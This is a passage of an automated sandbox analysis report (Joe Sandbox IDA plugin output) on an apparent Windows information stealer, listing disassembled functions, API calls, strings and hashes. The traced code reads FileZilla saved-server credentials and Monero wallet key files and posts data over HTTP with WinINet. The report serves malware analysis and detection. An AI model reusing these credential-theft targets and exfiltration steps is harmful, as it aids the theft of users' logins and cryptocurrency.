lstrcat.KERNEL32(?,?), ref: 00477903
lstrcat.KERNEL32(?,?), ref: 00477917
lstrcat.KERNEL32(?,0110E1B8), ref: 0047792B
lstrcat.KERNEL32(?,0110E2C0), ref: 0047793F
lstrcat.KERNEL32(?,0110E1D0), ref: 00477952
lstrcat.KERNEL32(?,0110E200), ref: 00477966
lstrcat.KERNEL32(?,01109D08), ref: 0047797A
lstrcat.KERNEL32(?,?), ref: 0047798E
lstrcat.KERNEL32(?,?), ref: 004779A2
lstrcat.KERNEL32(?,?), ref: 004779B6
lstrcat.KERNEL32(?,0110E1B8), ref: 004779C9
lstrcat.KERNEL32(?,0110E2C0), ref: 004779DD
lstrcat.KERNEL32(?,0110E1D0), ref: 004779F1
lstrcat.KERNEL32(?,0110E200), ref: 00477A04
lstrcat.KERNEL32(?,01109D70), ref: 00477A18
lstrcat.KERNEL32(?,?), ref: 00477A2C
lstrcat.KERNEL32(?,?), ref: 00477A40
lstrcat.KERNEL32(?,?), ref: 00477A54
lstrcat.KERNEL32(?,0110E1B8), ref: 00477A68
lstrcat.KERNEL32(?,0110E2C0), ref: 00477A7B
lstrcat.KERNEL32(?,0110E1D0), ref: 00477A8F
lstrcat.KERNEL32(?,0110E200), ref: 00477AA3
lstrcat.KERNEL32(?,01109DD8), ref: 00477AB6
lstrcat.KERNEL32(?,?), ref: 00477ACA
lstrcat.KERNEL32(?,?), ref: 00477ADE
lstrcat.KERNEL32(?,?), ref: 00477AF2
lstrcat.KERNEL32(?,0110E1B8), ref: 00477B06
lstrcat.KERNEL32(?,0110E2C0), ref: 00477B1A
lstrcat.KERNEL32(?,0110E1D0), ref: 00477B2D
lstrcat.KERNEL32(?,0110E200), ref: 00477B41
lstrcat.KERNEL32(?,0110E648), ref: 00477B55
lstrcat.KERNEL32(?,?), ref: 00477B69
lstrcat.KERNEL32(?,?), ref: 00477B7D
lstrcat.KERNEL32(?,?), ref: 00477B91
lstrcat.KERNEL32(?,0110E1B8), ref: 00477BA4
lstrcat.KERNEL32(?,0110E2C0), ref: 00477BB8
lstrcat.KERNEL32(?,0110E1D0), ref: 00477BCC
lstrcat.KERNEL32(?,0110E200), ref: 00477BDF
lstrcat.KERNEL32(?,0110E6B0), ref: 00477BF3
lstrcat.KERNEL32(?,?), ref: 00477C07
lstrcat.KERNEL32(?,?), ref: 00477C1B
lstrcat.KERNEL32(?,?), ref: 00477C2F
lstrcat.KERNEL32(?,0110E1B8), ref: 00477C43
lstrcat.KERNEL32(?,0110E2C0), ref: 00477C56
lstrcat.KERNEL32(?,0110E1D0), ref: 00477C6A
lstrcat.KERNEL32(?,0110E200), ref: 00477C7E

Part of subcall function 004775D0: lstrcat.KERNEL32(2F6D6020,004917FC), ref: 00477606
Part of subcall function 004775D0: lstrcat.KERNEL32(2F6D6020,00000000), ref: 00477648
Part of subcall function 004775D0: lstrcat.KERNEL32(2F6D6020, : ), ref: 0047765A
Part of subcall function 004775D0: lstrcat.KERNEL32(2F6D6020,00000000), ref: 0047768F
Part of subcall function 004775D0: lstrcat.KERNEL32(2F6D6020,00491804), ref: 004776A0
Part of subcall function 004775D0: lstrcat.KERNEL32(2F6D6020,00000000), ref: 004776D3
Part of subcall function 004775D0: lstrcat.KERNEL32(2F6D6020,00491808), ref: 004776ED
Part of subcall function 004775D0: task.LIBCPMTD ref: 004776FB

lstrcat.KERNEL32(?,0110E788), ref: 00477E0B
lstrcat.KERNEL32(?,0110D9E0), ref: 00477E1E
lstrlen.KERNEL32(2F6D6020), ref: 00477E2B
lstrlen.KERNEL32(2F6D6020), ref: 00477E3B

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 6388474fa6adf3fb1445239e4d47b6bbb886ec1d8a94f94be42734c53cbc792a
Instruction ID: cb67a832825a4d31af6c9424f05f9b12b9596a1b35891edbd7dfe42f64c8a28d
Opcode Fuzzy Hash: 6388474fa6adf3fb1445239e4d47b6bbb886ec1d8a94f94be42734c53cbc792a
Instruction Fuzzy Hash: 22321DF2900314ABCB15EBA0DC85DEE737DBB48704F445A9DF209A2490EE78E7898F55

Function 00480250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 00488DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

Part of subcall function 004799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
Part of subcall function 004799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
Part of subcall function 004799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
Part of subcall function 004799C0: ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
Part of subcall function 004799C0: LocalFree.KERNEL32(0047148F), ref: 00479A90
Part of subcall function 004799C0: CloseHandle.KERNEL32(000000FF), ref: 00479A9A

Part of subcall function 00488E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00488E52

GetProcessHeap.KERNEL32(00000000,000F423F,00490DBA,00490DB7,00490DB6,00490DB3), ref: 00480362
RtlAllocateHeap.NTDLL(00000000), ref: 00480369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00480385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 00480393
StrStrA.SHLWAPI(00000000,<Port>), ref: 004803CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 004803DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00480419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 00480427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00480463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 00480475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 00480502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 0048051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 00480532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 0048054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00480562
lstrcat.KERNEL32(?,profile: null), ref: 00480571
lstrcat.KERNEL32(?,url: ), ref: 00480580
lstrcat.KERNEL32(?,00000000), ref: 00480593
lstrcat.KERNEL32(?,00491678), ref: 004805A2
lstrcat.KERNEL32(?,00000000), ref: 004805B5
lstrcat.KERNEL32(?,0049167C), ref: 004805C4
lstrcat.KERNEL32(?,login: ), ref: 004805D3
lstrcat.KERNEL32(?,00000000), ref: 004805E6
lstrcat.KERNEL32(?,00491688), ref: 004805F5
lstrcat.KERNEL32(?,password: ), ref: 00480604
lstrcat.KERNEL32(?,00000000), ref: 00480617
lstrcat.KERNEL32(?,00491698), ref: 00480626
lstrcat.KERNEL32(?,0049169C), ref: 00480635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 0048068E

Strings

<User>, xrefs: 00480410
browser: FileZilla, xrefs: 00480559
<Host>, xrefs: 0048037C
password: , xrefs: 004805FB
login: , xrefs: 004805CA
<Port>, xrefs: 004803C6
<Pass encoding="base64">, xrefs: 0048045A
url: , xrefs: 00480577
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 004802A4
profile: null, xrefs: 00480568

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: dc181e2be3d58320fc9002ba93d9a3ca8ffb12c2a0e8c5c9154496bc9f2189b1
Instruction ID: bd8c10570c792efcb81e76d249e4ea09d8dcd7cad126e0e2c25c3f2cba19bf74
Opcode Fuzzy Hash: dc181e2be3d58320fc9002ba93d9a3ca8ffb12c2a0e8c5c9154496bc9f2189b1
Instruction Fuzzy Hash: 3AD141B1D10108ABDB04FBE1DD96EEE7739AF14304F50492EF102A6091DF7CAA59CB69

Function 00475100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

Part of subcall function 004747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00474839
Part of subcall function 004747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00474849

lstrlen.KERNEL32(00000000), ref: 00475193

Part of subcall function 00488EA0: CryptBinaryToStringA.CRYPT32(00000000,00475184,40000001,00000000,00000000,?,00475184), ref: 00488EC0

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00475207
StrCmpCA.SHLWAPI(?,0110E8F8), ref: 00475225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00475340
HttpOpenRequestA.WININET(00000000,0110E8E8,?,0110E278,00000000,00000000,00400100,00000000), ref: 004753A4

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0110E908,00000000,?,0110A2A0,00000000,?,004919DC,00000000,?,004851CF), ref: 00475737
lstrlen.KERNEL32(00000000), ref: 0047574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0047575C
RtlAllocateHeap.NTDLL(00000000), ref: 00475763
lstrlen.KERNEL32(00000000), ref: 00475778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004757A9
lstrlen.KERNEL32(00000000), ref: 004757C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004757E1
lstrlen.KERNEL32(00000000,?,?), ref: 0047580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00475822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0047584D
InternetCloseHandle.WININET(00000000), ref: 004758B1
InternetCloseHandle.WININET(00000000), ref: 004758BE
InternetCloseHandle.WININET(00000000), ref: 004758C8

Strings

------, xrefs: 0047563B
", xrefs: 00475482
------, xrefs: 004754F9
------, xrefs: 00475297
", xrefs: 004755C4
------, xrefs: 004753B7
--, xrefs: 00475280
", xrefs: 00475706

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: 5a17c3fbd23c968ac6f1eb5235610ece9c98e086d3b793acf7ad494ec86ba4ec
Instruction ID: a8e592f0c0a90e0f63e51a3e885879c29fcfefe87ca286431dbe4e72466bc738
Opcode Fuzzy Hash: 5a17c3fbd23c968ac6f1eb5235610ece9c98e086d3b793acf7ad494ec86ba4ec
Instruction Fuzzy Hash: 00321DB1920118AAEB14FBA1DC91FEE7378BF14704F50459FF10662091DFB82A59CF6A

Function 0047A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0048AA70: StrCmpCA.SHLWAPI(01109068,0047A7A7,?,0047A7A7,01109068), ref: 0048AA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0047AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0047AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0047ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0047A8B0

Part of subcall function 0048A820: lstrlen.KERNEL32(00474F05,?,?,00474F05,00490DDE), ref: 0048A82B
Part of subcall function 0048A820: lstrcpy.KERNEL32(00490DDE,00000000), ref: 0048A885

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

lstrcat.KERNEL32(?,00000000), ref: 0047ACEB
lstrcat.KERNEL32(?,00491320), ref: 0047ACFA
lstrcat.KERNEL32(?,00000000), ref: 0047AD0D
lstrcat.KERNEL32(?,00491324), ref: 0047AD1C
lstrcat.KERNEL32(?,00000000), ref: 0047AD2F
lstrcat.KERNEL32(?,00491328), ref: 0047AD3E
lstrcat.KERNEL32(?,00000000), ref: 0047AD51
lstrcat.KERNEL32(?,0049132C), ref: 0047AD60
lstrcat.KERNEL32(?,00000000), ref: 0047AD73
lstrcat.KERNEL32(?,00491330), ref: 0047AD82
lstrcat.KERNEL32(?,00000000), ref: 0047AD95
lstrcat.KERNEL32(?,00491334), ref: 0047ADA4
lstrcat.KERNEL32(?,00000000), ref: 0047ADB7
lstrlen.KERNEL32(?), ref: 0047AE0D
lstrlen.KERNEL32(?), ref: 0047AE1C

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

DeleteFileA.KERNEL32(00000000), ref: 0047AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0047ABD4

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: 40e9efaba6ff1f9e2ed3f0766854736e5bec652ce8a9145dcc1752d73c00562d
Instruction ID: 331d444f9d02f2fe7d6cd007c149a91d00c5436d2cea37dfa22e643a915736bb
Opcode Fuzzy Hash: 40e9efaba6ff1f9e2ed3f0766854736e5bec652ce8a9145dcc1752d73c00562d
Instruction Fuzzy Hash: FD1251B1910104ABEB08FBA1DD92EEE7339AF54304F50455FF406A2091DE7C6A55CB7A

Function 00475960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

Part of subcall function 004747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00474839
Part of subcall function 004747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00474849

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004759F8
StrCmpCA.SHLWAPI(?,0110E8F8), ref: 00475A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00475B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0110E898,00000000,?,0110A2A0,00000000,?,00491A1C), ref: 00475E71
lstrlen.KERNEL32(00000000), ref: 00475E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00475E93
RtlAllocateHeap.NTDLL(00000000), ref: 00475E9A
lstrlen.KERNEL32(00000000), ref: 00475EAF
lstrlen.KERNEL32(00000000), ref: 00475ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00475EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00475F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00475F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00475F4C
InternetCloseHandle.WININET(00000000), ref: 00475FB0
InternetCloseHandle.WININET(00000000), ref: 00475FBD
HttpOpenRequestA.WININET(00000000,0110E8E8,?,0110E278,00000000,00000000,00400100,00000000), ref: 00475BF8

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

InternetCloseHandle.WININET(00000000), ref: 00475FC7

Strings

", xrefs: 00475E16
------, xrefs: 00475C0B
", xrefs: 00475CD5
------, xrefs: 00475D4C
------, xrefs: 00475A96

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

